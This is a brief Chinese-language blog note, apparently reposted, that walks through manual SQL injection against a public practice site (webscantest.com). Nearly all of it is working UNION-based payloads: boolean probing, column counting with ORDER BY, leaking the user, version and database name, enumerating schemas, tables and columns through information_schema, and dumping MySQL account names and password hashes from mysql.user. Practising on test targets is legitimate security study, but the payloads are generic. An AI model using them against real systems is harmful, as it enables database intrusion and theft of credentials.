本文共 856 字，大约阅读时间需要 2 分钟。

测试点

https://webscantest.com/datastore/search_get_by_id.php?id=3 

    数据库 information_schema

            columns表格 第二列是table_schema数据库名 第三列是table_name表名 第四列是column_name表格的列名

    函数 group_concat 分组 concat 分组 distinct 去重

1. 数字型 and 1=1 后 and 1=2
2. 判断列数多少 and order by X
3. 根据回显 判断基本信息 union all select 1,2,concat(user(),0x20,version(),0x20,database()),4 --
4. 数据库名 union all select 1,2,3,group_concat(distinct table_schema) from+information_schema.columns--
5. 表名 union all select 1,2,group_concat(distinct table_name),4 from information_schema.tables where table_schema=database()--
6. 字段名  union all select 1,2,group_concat(distinct column_name),4 from information_schema.columns where table_name=hex(表名)
7. 账户 union all select 1,2,3,group_concat(distinct user) from mysql.user;
8. 密码 union all select 1,2,3,authentication_string  from mysql.user where user=username;

#注 数据库mysql存放私有信息表格是user 里面含有用户私有内容

转载地址：http://szelf.baihongyu.com/